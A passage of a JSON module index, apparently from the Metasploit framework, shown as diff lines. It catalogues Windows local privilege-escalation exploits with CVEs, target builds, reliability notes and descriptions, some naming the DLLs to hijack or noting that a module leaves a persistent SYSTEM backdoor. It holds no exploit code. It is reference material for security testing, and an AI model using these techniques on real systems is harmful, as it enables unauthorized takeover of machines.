- "actions": [] - }, - "exploit_windows/local/canon_driver_privesc": { - "name": "Canon Driver Privilege Escalation", - "fullname": "exploit/windows/local/canon_driver_privesc", - "aliases": [], - "rank": 300, - "disclosure_date": "2021-08-07", - "type": "exploit", - "author": [ - "Jacob Baines", - "Shelby Pace" - ], - "description": "Canon TR150 print drivers versions 3.71.2.10 and below allow local users to read/write files\n within the \"CanonBJ\" directory and its subdirectories. 
By overwriting the DLL at\n C:\\ProgramData\\CanonBJ\\IJPrinter\\CNMWINDOWS\\Canon TR150 series\\LanguageModules\\040C\\CNMurGE.dll\n with a malicious DLL at the right time whilst running the C:\\Windows\\System32\\Printing_Admin_Scripts\\en-US\\prnmngr.vbs\n script to install a new printer, a timing issue can be exploited to cause the PrintIsolationHost.exe program,\n which runs as NT AUTHORITY\\SYSTEM, to successfully load the malicious DLL. Successful exploitation\n will grant attackers code execution as the NT AUTHORITY\\SYSTEM user.\n\n This module leverages the prnmngr.vbs script\n to add and delete printers. Multiple runs of this\n module may be required given successful exploitation\n is time-sensitive.", - "references": [ - "CVE-2021-38085" - ], - "platform": "Windows", - "arch": "x86, x64", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows" - ], - "mod_time": "2021-09-08 21:56:02 +0000", - "path": "/modules/exploits/windows/local/canon_driver_privesc.rb", - "is_install_path": true, - "ref_name": "windows/local/canon_driver_privesc", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": { - "SideEffects": [ - "artifacts-on-disk" - ], - "Reliability": [ - "unreliable-session" - ], - "Stability": [ - "service-resource-loss" - ] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": true, - "actions": [] - }, - "exploit_windows/local/capcom_sys_exec": { - "name": "Windows Capcom.sys Kernel Execution Exploit (x64 only)", - "fullname": "exploit/windows/local/capcom_sys_exec", - "aliases": [], - "rank": 300, - "disclosure_date": "1999-01-01", - "type": "exploit", - "author": [ - "TheWack0lian", - "OJ Reeves" - ], - "description": "This module abuses the Capcom.sys kernel driver's function that allows for an\n arbitrary function to be executed in the kernel from user land. 
This function\n purposely disables SMEP prior to invoking a function given by the caller.\n This has been tested on Windows 7, 8.1, 10 (x64) and Windows 11 (x64) upto build 22000.194.\n Note that builds after 22000.194 contain deny lists that prevent this driver from loading.", - "references": [ - "URL-https://twitter.com/TheWack0lian/status/779397840762245124" - ], - "platform": "Windows", - "arch": "x64", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows x64" - ], - "mod_time": "2023-09-08 13:05:44 +0000", - "path": "/modules/exploits/windows/local/capcom_sys_exec.rb", - "is_install_path": true, - "ref_name": "windows/local/capcom_sys_exec", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "exploit_windows/local/comahawk": { - "name": "Microsoft UPnP Local Privilege Elevation Vulnerability", - "fullname": "exploit/windows/local/comahawk", - "aliases": [], - "rank": 600, - "disclosure_date": "2019-11-12", - "type": "exploit", - "author": [ - "NCC Group", - "hoangprod", - "bwatters-r7" - ], - "description": "This exploit uses two vulnerabilities to execute a command as an elevated user.\n The first (CVE-2019-1405) uses the UPnP Device Host Service to elevate to\n NT AUTHORITY\\LOCAL SERVICE\n The second (CVE-2019-1322) leverages the Update Orchestrator Service to\n elevate from NT AUTHORITY\\LOCAL SERVICE to NT AUTHORITY\\SYSTEM.", - "references": [ - "CVE-2019-1322", - "CVE-2019-1405", - "EDB-47684", - "URL-https://github.com/apt69/COMahawk", - "URL-https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2019/november/cve-2019-1405-and-cve-2019-1322-elevation-to-system-via-the-upnp-device-host-service-and-the-update-orchestrator-service/", - "URL-https://fortiguard.com/threat-signal-report/3243/new-proof-of-concept-combining-cve-2019-1322-and-cve-2019-1405-developed-1" - ], - 
"platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows x64" - ], - "mod_time": "2023-05-25 12:45:30 +0000", - "path": "/modules/exploits/windows/local/comahawk.rb", - "is_install_path": true, - "ref_name": "windows/local/comahawk", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "exploit_windows/local/current_user_psexec": { - "name": "PsExec via Current User Token", - "fullname": "exploit/windows/local/current_user_psexec", - "aliases": [], - "rank": 600, - "disclosure_date": "1999-01-01", - "type": "exploit", - "author": [ - "egypt ", - "jabra" - ], - "description": "This module uploads an executable file to the victim system, creates\n a share containing that executable, creates a remote service on each\n target system using a UNC path to that file, and finally starts the\n service(s).\n\n The result is similar to psexec but with the added benefit of using\n the session's current authentication token instead of having to know\n a password or hash.", - "references": [ - "CVE-1999-0504", - "OSVDB-3106", - "URL-http://technet.microsoft.com/en-us/sysinternals/bb897553.aspx" - ], - "platform": "Windows", - "arch": "x86, x64", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Universal" - ], - "mod_time": "2021-10-06 13:43:31 +0000", - "path": "/modules/exploits/windows/local/current_user_psexec.rb", - "is_install_path": true, - "ref_name": "windows/local/current_user_psexec", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "exploit_windows/local/cve_2017_8464_lnk_lpe": { - "name": "LNK Code Execution Vulnerability", - "fullname": "exploit/windows/local/cve_2017_8464_lnk_lpe", - "aliases": [], - 
"rank": 500, - "disclosure_date": "2017-06-13", - "type": "exploit", - "author": [ - "Uncredited", - "Yorick Koster", - "Spencer McIntyre" - ], - "description": "This module exploits a vulnerability in the handling of Windows Shortcut files (.LNK)\n that contain a dynamic icon, loaded from a malicious DLL.\n\n This vulnerability is a variant of MS15-020 (CVE-2015-0096). The created LNK file is\n similar except an additional SpecialFolderDataBlock is included. The folder ID set\n in this SpecialFolderDataBlock is set to the Control Panel. This is enough to bypass\n the CPL whitelist. This bypass can be used to trick Windows into loading an arbitrary\n DLL file.\n\n The PATH option must be an absolute path to a writeable directory which is indexed for\n searching. If no PATH is specified, the module defaults to %USERPROFILE%.", - "references": [ - "CVE-2017-8464", - "URL-https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8464", - "URL-http://www.vxjump.net/files/vuln_analysis/cve-2017-8464.txt", - "URL-https://msdn.microsoft.com/en-us/library/dd871305.aspx", - "URL-http://www.geoffchappell.com/notes/security/stuxnet/ctrlfldr.htm", - "URL-https://www.trendmicro.de/cloud-content/us/pdfs/security-intelligence/white-papers/wp-cpl-malware.pdf" - ], - "platform": "Windows", - "arch": "x86, x64", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows x64", - "Windows x86" - ], - "mod_time": "2023-03-13 10:31:27 +0000", - "path": "/modules/exploits/windows/local/cve_2017_8464_lnk_lpe.rb", - "is_install_path": true, - "ref_name": "windows/local/cve_2017_8464_lnk_lpe", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-service-restarts" - ], - "SideEffects": [ - "artifacts-on-disk" - ] - }, - "session_types": [], - "needs_cleanup": true, - "actions": [] - }, - "exploit_windows/local/cve_2018_8453_win32k_priv_esc": { - "name": "Windows 
NtUserSetWindowFNID Win32k User Callback", - "fullname": "exploit/windows/local/cve_2018_8453_win32k_priv_esc", - "aliases": [], - "rank": 0, - "disclosure_date": "2018-10-09", - "type": "exploit", - "author": [ - "ze0r", - "Kaspersky Lab", - "Jacob Robles" - ], - "description": "An elevation of privilege vulnerability exists in Windows when the Win32k component\n fails to properly handle objects in memory, aka \"Win32k Elevation of Privilege Vulnerability.\"\n This affects Windows 7, Windows Server 2012 R2, Windows RT 8.1, Windows Server 2008, Windows\n Server 2019, Windows Server 2012, Windows 8.1, Windows Server 2016, Windows Server 2008 R2,\n Windows 10, Windows 10 Servers.\n This module is tested against Windows 10 v1703 x86.", - "references": [ - "CVE-2018-8453", - "URL-https://github.com/ze0r/cve-2018-8453-exp", - "URL-https://mp.weixin.qq.com/s/ogKCo-Jp8vc7otXyu6fTig", - "URL-https://mp.weixin.qq.com/s/dcbUeegM0BqErtDufOXfoQ", - "URL-https://securelist.com/cve-2018-8453-used-in-targeted-attacks/88151/", - "URL-https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8453" - ], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows 10 v1703 (Build 15063) x86" - ], - "mod_time": "2023-05-25 12:45:30 +0000", - "path": "/modules/exploits/windows/local/cve_2018_8453_win32k_priv_esc.rb", - "is_install_path": true, - "ref_name": "windows/local/cve_2018_8453_win32k_priv_esc", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "SideEffects": [ - "artifacts-on-disk", - "screen-effects" - ], - "Stability": [ - "crash-os-restarts" - ] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": true, - "actions": [] - }, - "exploit_windows/local/cve_2019_1458_wizardopium": { - "name": "Microsoft Windows Uninitialized Variable Local Privilege Elevation", - "fullname": "exploit/windows/local/cve_2019_1458_wizardopium", - 
"aliases": [], - "rank": 300, - "disclosure_date": "2019-12-10", - "type": "exploit", - "author": [ - "piotrflorczyk", - "unamer", - "timwr" - ], - "description": "This module exploits CVE-2019-1458, an arbitrary pointer dereference vulnerability\n within win32k which occurs due to an uninitalized variable, which allows user mode attackers\n to write a limited amount of controlled data to an attacker controlled address\n in kernel memory. By utilizing this vulnerability to execute controlled writes\n to kernel memory, an attacker can gain arbitrary code execution\n as the SYSTEM user.\n\n This module has been tested against Windows 7 x64 SP1. Offsets within the\n exploit code may need to be adjusted to work with other versions of Windows.\n The exploit can only be triggered once against the target and can cause the\n target machine to reboot when the session is terminated.", - "references": [ - "CVE-2019-1458", - "URL-https://github.com/unamer/CVE-2019-1458", - "URL-https://github.com/piotrflorczyk/cve-2019-1458_POC", - "URL-https://securelist.com/windows-0-day-exploit-cve-2019-1458-used-in-operation-wizardopium/95432/", - "URL-https://googleprojectzero.blogspot.com/p/rca-cve-2019-1458.html" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows 7 x64" - ], - "mod_time": "2023-05-25 12:45:30 +0000", - "path": "/modules/exploits/windows/local/cve_2019_1458_wizardopium.rb", - "is_install_path": true, - "ref_name": "windows/local/cve_2019_1458_wizardopium", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-os-restarts" - ], - "Reliability": [ - "unreliable-session" - ], - "SideEffects": [ - "ioc-in-logs" - ] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "exploit_windows/local/cve_2020_0668_service_tracing": { - "name": "Service Tracing Privilege Elevation Vulnerability", - 
"fullname": "exploit/windows/local/cve_2020_0668_service_tracing", - "aliases": [], - "rank": 600, - "disclosure_date": "2020-02-11", - "type": "exploit", - "author": [ - "itm4n", - "bwatters-r7" - ], - "description": "This module leverages a trusted file overwrite with a DLL hijacking\n vulnerability to gain SYSTEM-level access on vulnerable Windows 10 x64\n targets.", - "references": [ - "CVE-2020-0668", - "URL-https://itm4n.github.io/cve-2020-0668-windows-service-tracing-eop/", - "URL-https://github.com/itm4n/SysTracingPoc", - "URL-https://github.com/RedCursorSecurityConsulting/CVE-2020-0668", - "PACKETSTORM-156576", - "URL-https://attackerkb.com/assessments/ea5921d4-6046-4a3b-963f-08e8bde1762a", - "URL-https://googleprojectzero.blogspot.com/2018/04/windows-exploitation-tricks-exploiting.html" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows x64" - ], - "mod_time": "2024-12-12 17:11:53 +0000", - "path": "/modules/exploits/windows/local/cve_2020_0668_service_tracing.rb", - "is_install_path": true, - "ref_name": "windows/local/cve_2020_0668_service_tracing", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [ - "artifacts-on-disk" - ], - "Reliability": [ - "repeatable-session" - ] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": true, - "actions": [] - }, - "exploit_windows/local/cve_2020_0787_bits_arbitrary_file_move": { - "name": "Background Intelligent Transfer Service Arbitrary File Move Privilege Elevation Vulnerability", - "fullname": "exploit/windows/local/cve_2020_0787_bits_arbitrary_file_move", - "aliases": [], - "rank": 600, - "disclosure_date": "2020-03-10", - "type": "exploit", - "author": [ - "itm4n", - "gwillcox-r7" - ], - "description": "This module exploits CVE-2020-0787, an arbitrary file move vulnerability in outdated versions of the\n Background 
Intelligent Transfer Service (BITS), to overwrite C:\\Windows\\System32\\WindowsCoreDeviceInfo.dll\n with a malicious DLL containing the attacker's payload.\n\n To achieve code execution as the SYSTEM user, the Update Session Orchestrator service is then started, which\n will result in the malicious WindowsCoreDeviceInfo.dll being run with SYSTEM privileges due to a DLL hijacking\n issue within the Update Session Orchestrator Service.\n\n Note that presently this module only works on Windows 10 and Windows Server 2016 and later as the\n Update Session Orchestrator Service was only introduced in Windows 10. Note that only Windows 10 has been tested,\n so your mileage may vary on Windows Server 2016 and later.", - "references": [ - "CVE-2020-0787", - "URL-https://itm4n.github.io/cve-2020-0787-windows-bits-eop/", - "URL-https://github.com/itm4n/BitsArbitraryFileMove", - "URL-https://attackerkb.com/assessments/e61cfec0-d766-4e7e-89f7-5aad2460afb8", - "URL-https://googleprojectzero.blogspot.com/2018/04/windows-exploitation-tricks-exploiting.html", - "URL-https://itm4n.github.io/usodllloader-part1/", - "URL-https://itm4n.github.io/usodllloader-part2/" - ], - "platform": "Windows", - "arch": "x86, x64", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows DLL Dropper" - ], - "mod_time": "2024-02-07 11:20:12 +0000", - "path": "/modules/exploits/windows/local/cve_2020_0787_bits_arbitrary_file_move.rb", - "is_install_path": true, - "ref_name": "windows/local/cve_2020_0787_bits_arbitrary_file_move", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": { - "SideEffects": [ - "artifacts-on-disk" - ], - "Reliability": [ - "repeatable-session" - ], - "Stability": [ - "crash-safe" - ] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": true, - "actions": [] - }, - "exploit_windows/local/cve_2020_0796_smbghost": { - "name": "SMBv3 Compression Buffer Overflow", - "fullname": 
"exploit/windows/local/cve_2020_0796_smbghost", - "aliases": [], - "rank": 400, - "disclosure_date": "2020-03-13", - "type": "exploit", - "author": [ - "Daniel García Gutiérrez", - "Manuel Blanco Parajón", - "Spencer McIntyre" - ], - "description": "A vulnerability exists within the Microsoft Server Message Block 3.1.1 (SMBv3) protocol that can be leveraged to\n execute code on a vulnerable server. This local exploit implementation leverages this flaw to elevate itself\n before injecting a payload into winlogon.exe.", - "references": [ - "CVE-2020-0796", - "URL-https://github.com/danigargu/CVE-2020-0796", - "URL-https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/adv200005" - ], - "platform": "Windows", - "arch": "x86, x64", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows 10 v1903-1909 x64" - ], - "mod_time": "2023-05-25 12:45:30 +0000", - "path": "/modules/exploits/windows/local/cve_2020_0796_smbghost.rb", - "is_install_path": true, - "ref_name": "windows/local/cve_2020_0796_smbghost", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": { - "AKA": [ - "SMBGhost", - "CoronaBlue" - ], - "Stability": [ - "crash-os-restarts" - ], - "SideEffects": [ - "ioc-in-logs" - ], - "Reliability": [ - "repeatable-session" - ], - "RelatedModules": [ - "exploit/windows/smb/cve_2020_0796_smbghost" - ] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "exploit_windows/local/cve_2020_1048_printerdemon": { - "name": "Microsoft Spooler Local Privilege Elevation Vulnerability", - "fullname": "exploit/windows/local/cve_2020_1048_printerdemon", - "aliases": [], - "rank": 300, - "disclosure_date": "2019-11-04", - "type": "exploit", - "author": [ - "Yarden Shafir", - "Alex Ionescu", - "shubham0d", - "bwatters-r7" - ], - "description": "This exploit leverages a file write vulnerability in the print spooler service\n which will restart if stopped. 
Because the service cannot be stopped long\n enough to remove the dll, there is no way to remove the dll once\n it is loaded by the service. Essentially, on default settings, this module\n adds a permanent elevated backdoor.", - "references": [ - "CVE-2020-1048", - "URL-https://windows-internals.com/printdemon-cve-2020-1048/" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Automatic" - ], - "mod_time": "2023-02-10 18:04:31 +0000", - "path": "/modules/exploits/windows/local/cve_2020_1048_printerdemon.rb", - "is_install_path": true, - "ref_name": "windows/local/cve_2020_1048_printerdemon", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-os-restarts" - ], - "Reliability": [ - "unreliable-session" - ], - "SideEffects": [ - "artifacts-on-disk", - "screen-effects" - ] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "exploit_windows/local/cve_2020_1054_drawiconex_lpe": { - "name": "Microsoft Windows DrawIconEx OOB Write Local Privilege Elevation", - "fullname": "exploit/windows/local/cve_2020_1054_drawiconex_lpe", - "aliases": [], - "rank": 300, - "disclosure_date": "2020-02-20", - "type": "exploit", - "author": [ - "Netanel Ben-Simon", - "Yoav Alon", - "bee13oy", - "timwr" - ], - "description": "This module exploits CVE-2020-1054, an out of bounds write reachable from DrawIconEx\n within win32k. The out of bounds write can be used to overwrite the pvbits of a\n SURFOBJ. By utilizing this vulnerability to execute controlled writes to kernel\n memory, an attacker can gain arbitrary code execution as the SYSTEM user.\n\n This module has been tested against a fully updated Windows 7 x64 SP1. 
Offsets\n within the exploit code may need to be adjusted to work with other versions of\n Windows.", - "references": [ - "CVE-2020-1054", - "URL-https://cpr-zero.checkpoint.com/vulns/cprid-2153/", - "URL-https://0xeb-bp.com/blog/2020/06/15/cve-2020-1054-analysis.html", - "URL-https://github.com/DreamoneOnly/2020-1054/blob/master/x64_src/main.cpp", - "URL-https://github.com/KaLendsi/CVE-2020-1054/blob/master/CVE-2020-1054/exploit.cpp", - "URL-https://github.com/Iamgublin/CVE-2020-1054/blob/master/ConsoleApplication4.cpp" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows 7 x64" - ], - "mod_time": "2023-05-25 12:45:30 +0000", - "path": "/modules/exploits/windows/local/cve_2020_1054_drawiconex_lpe.rb", - "is_install_path": true, - "ref_name": "windows/local/cve_2020_1054_drawiconex_lpe", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-os-restarts" - ], - "Reliability": [ - "unreliable-session" - ], - "SideEffects": [ - "ioc-in-logs" - ] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "exploit_windows/local/cve_2020_1313_system_orchestrator": { - "name": "Windows Update Orchestrator unchecked ScheduleWork call", - "fullname": "exploit/windows/local/cve_2020_1313_system_orchestrator", - "aliases": [], - "rank": 600, - "disclosure_date": "2019-11-04", - "type": "exploit", - "author": [ - "Imre Rad", - "bwatters-r7" - ], - "description": "This exploit uses access to the UniversalOrchestrator ScheduleWork API call\n which does not verify the caller's token before scheduling a job to be run\n as SYSTEM. 
You cannot schedule something in a given time, so the payload will\n execute as system sometime in the next 24 hours.", - "references": [ - "CVE-2020-1313", - "URL-https://github.com/irsl/CVE-2020-1313" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows x64" - ], - "mod_time": "2023-05-25 12:45:30 +0000", - "path": "/modules/exploits/windows/local/cve_2020_1313_system_orchestrator.rb", - "is_install_path": true, - "ref_name": "windows/local/cve_2020_1313_system_orchestrator", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "Reliability": [], - "SideEffects": [ - "ioc-in-logs", - "artifacts-on-disk" - ] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "exploit_windows/local/cve_2020_1337_printerdemon": { - "name": "Microsoft Spooler Local Privilege Elevation Vulnerability", - "fullname": "exploit/windows/local/cve_2020_1337_printerdemon", - "aliases": [], - "rank": 600, - "disclosure_date": "2019-11-04", - "type": "exploit", - "author": [ - "Peleg Hadar", - "Tomer Bar", - "404death", - "sailay1996", - "bwatters-r7" - ], - "description": "This exploit leverages a file write vulnerability in the print spooler service\n which will restart if stopped. Because the service cannot be stopped long\n enough to remove the dll, there is no way to remove the dll once\n it is loaded by the service. 
Essentially, on default settings, this module\n adds a permanent elevated backdoor.", - "references": [ - "CVE-2020-1337", - "URL-https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-1337", - "URL-https://github.com/sailay1996/cve-2020-1337-poc", - "URL-https://voidsec.com/cve-2020-1337-printdemon-is-dead-long-live-printdemon/" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Automatic" - ], - "mod_time": "2023-05-25 12:45:30 +0000", - "path": "/modules/exploits/windows/local/cve_2020_1337_printerdemon.rb", - "is_install_path": true, - "ref_name": "windows/local/cve_2020_1337_printerdemon", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "Reliability": [], - "SideEffects": [ - "ioc-in-logs", - "artifacts-on-disk" - ] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "exploit_windows/local/cve_2020_17136": { - "name": "CVE-2020-1170 Cloud Filter Arbitrary File Creation EOP", - "fullname": "exploit/windows/local/cve_2020_17136", - "aliases": [], - "rank": 300, - "disclosure_date": "2020-03-10", - "type": "exploit", - "author": [ - "James Foreshaw", - "Grant Willcox" - ], - "description": "The Cloud Filter driver, cldflt.sys, on Windows 10 v1803 and later, prior to the December\n 2020 updates, did not set the IO_FORCE_ACCESS_CHECK or OBJ_FORCE_ACCESS_CHECK flags when\n calling FltCreateFileEx() and FltCreateFileEx2() within its HsmpOpCreatePlaceholders()\n function with attacker controlled input. 
This meant that files were created with\n KernelMode permissions, thereby bypassing any security checks that would otherwise\n prevent a normal user from being able to create files in directories\n they don't have permissions to create files in.\n\n This module abuses this vulnerability to perform a DLL hijacking attack against the\n Microsoft Storage Spaces SMP service, which grants the attacker code execution as the\n NETWORK SERVICE user. Users are strongly encouraged to set the PAYLOAD option to one\n of the Meterpreter payloads, as doing so will allow them to subsequently escalate their\n new session from NETWORK SERVICE to SYSTEM by using Meterpreter's \"getsystem\" command\n to perform RPCSS Named Pipe Impersonation and impersonate the SYSTEM user.", - "references": [ - "CVE-2020-17136", - "URL-https://bugs.chromium.org/p/project-zero/issues/detail?id=2082", - "URL-https://msrc.microsoft.com/update-guide/vulnerability/CVE-2020-17136" - ], - "platform": "Windows", - "arch": "x64", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows DLL Dropper" - ], - "mod_time": "2024-02-07 11:25:41 +0000", - "path": "/modules/exploits/windows/local/cve_2020_17136.rb", - "is_install_path": true, - "ref_name": "windows/local/cve_2020_17136", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": { - "SideEffects": [ - "artifacts-on-disk" - ], - "Reliability": [ - "repeatable-session" - ], - "Stability": [ - "crash-safe" - ] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": true, - "actions": [] - }, - "exploit_windows/local/cve_2021_21551_dbutil_memmove": { - "name": "Dell DBUtil_2_3.sys IOCTL memmove", - "fullname": "exploit/windows/local/cve_2021_21551_dbutil_memmove", - "aliases": [], - "rank": 400, - "disclosure_date": "2021-05-04", - "type": "exploit", - "author": [ - "Kasif Dekel", - "SentinelLabs", - "Spencer McIntyre" - ], - "description": "The DBUtil_2_3.sys driver distributed by 
Dell exposes an unprotected IOCTL interface that can be abused by\n an attacker read and write kernel-mode memory.", - "references": [ - "CVE-2021-21551", - "URL-https://labs.sentinelone.com/cve-2021-21551-hundreds-of-millions-of-dell-computers-at-risk-due-to-multiple-bios-driver-privilege-escalation-flaws/", - "URL-https://www.dell.com/support/kbdoc/ro-ro/000186019/dsa-2021-088-dell-client-platform-security-update-for-dell-driver-insufficient-access-control-vulnerability" - ], - "platform": "Windows", - "arch": "x64", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows x64" - ], - "mod_time": "2023-02-10 18:04:31 +0000", - "path": "/modules/exploits/windows/local/cve_2021_21551_dbutil_memmove.rb", - "is_install_path": true, - "ref_name": "windows/local/cve_2021_21551_dbutil_memmove", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-os-restarts" - ], - "Reliability": [ - "repeatable-session" - ], - "SideEffects": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "exploit_windows/local/cve_2021_40449": { - "name": "Win32k NtGdiResetDC Use After Free Local Privilege Elevation", - "fullname": "exploit/windows/local/cve_2021_40449", - "aliases": [], - "rank": 400, - "disclosure_date": "2021-10-12", - "type": "exploit", - "author": [ - "IronHusky", - "Costin Raiu", - "Boris Larin", - "Red Raindrop Team of Qi'anxin Threat Intelligence Center", - "KaLendsi", - "ly4k", - "Grant Willcox" - ], - "description": "A use after free vulnerability exists in the `NtGdiResetDC()` function of Win32k which can be leveraged by\n an attacker to escalate privileges to those of `NT AUTHORITY\\SYSTEM`. The flaw exists due to the fact\n that this function calls `hdcOpenDCW()`, which performs a user mode callback. 
During this callback, attackers\n can call the `NtGdiResetDC()` function again with the same handle as before, which will result in the PDC object\n that is referenced by this handle being freed. The attacker can then replace the memory referenced by the handle\n with their own object, before passing execution back to the original `NtGdiResetDC()` call, which will now use the\n attacker's object without appropriate validation. This can then allow the attacker to manipulate the state of the\n kernel and, together with additional exploitation techniques, gain code execution as NT AUTHORITY\\SYSTEM.\n\n This module has been tested to work on Windows 10 x64 RS1 (build 14393) and RS5 (build 17763), however previous versions\n of Windows 10 will likely also work.", - "references": [ - "CVE-2021-40449", - "URL-https://securelist.com/mysterysnail-attacks-with-windows-zero-day/104509/", - "URL-https://mp.weixin.qq.com/s/AcFS0Yn9SDuYxFnzbBqhkQ", - "URL-https://github.com/KaLendsi/CVE-2021-40449-Exploit", - "URL-https://github.com/ly4k/CallbackHell" - ], - "platform": "Windows", - "arch": "x64", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows 10 x64 RS1 (build 14393) and RS5 (build 17763)" - ], - "mod_time": "2024-02-07 11:28:00 +0000", - "path": "/modules/exploits/windows/local/cve_2021_40449.rb", - "is_install_path": true, - "ref_name": "windows/local/cve_2021_40449", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-os-restarts" - ], - "Reliability": [ - "repeatable-session" - ], - "SideEffects": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "exploit_windows/local/cve_2022_21882_win32k": { - "name": "Win32k ConsoleControl Offset Confusion", - "fullname": "exploit/windows/local/cve_2022_21882_win32k", - "aliases": [ - "exploit/windows/local/cve_2021_1732_win32k" - ], - "rank": 200, - "disclosure_date": "2021-02-09", 
- "type": "exploit", - "author": [ - "BITTER APT", - "JinQuan", - "MaDongZe", - "TuXiaoYi", - "LiHao", - "L4ys", - "KaLendsi", - "Spencer McIntyre" - ], - "description": "A vulnerability exists within win32k that can be leveraged by an attacker to escalate privileges to those of\n NT AUTHORITY\\SYSTEM. The flaw exists in how the WndExtra field of a window can be manipulated into being\n treated as an offset despite being populated by an attacker-controlled value. This can be leveraged to\n achieve an out of bounds write operation, eventually leading to privilege escalation.\n\n This flaw was originally identified as CVE-2021-1732 and was patched by Microsoft on February 9th, 2021.\n In early 2022, a technique to bypass the patch was identified and assigned CVE-2022-21882. The root cause is\n is the same for both vulnerabilities. This exploit combines the patch bypass with the original exploit to\n function on a wider range of Windows 10 targets.", - "references": [ - "CVE-2021-1732", - "URL-https://ti.dbappsecurity.com.cn/blog/index.php/2021/02/10/windows-kernel-zero-day-exploit-is-used-by-bitter-apt-in-targeted-attack/", - "URL-https://github.com/KaLendsi/CVE-2021-1732-Exploit", - "URL-https://attackerkb.com/assessments/1a332300-7ded-419b-b717-9bf03ca2a14e", - "URL-https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-1732", - "URL-https://www.fuzzysecurity.com/tutorials/expDev/22.html", - "URL-https://www.geoffchappell.com/studies/windows/win32/user32/structs/wnd/index.htm", - "URL-https://byteraptors.github.io/windows/exploitation/2020/06/03/exploitingcve2019-1458.html", - "URL-https://www.trendmicro.com/en_us/research/16/l/one-bit-rule-system-analyzing-cve-2016-7255-exploit-wild.html", - "CVE-2022-21882", - "URL-https://github.com/L4ys/CVE-2022-21882", - "URL-https://github.com/KaLendsi/CVE-2022-21882" - ], - "platform": "Windows", - "arch": "x64", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows 10 
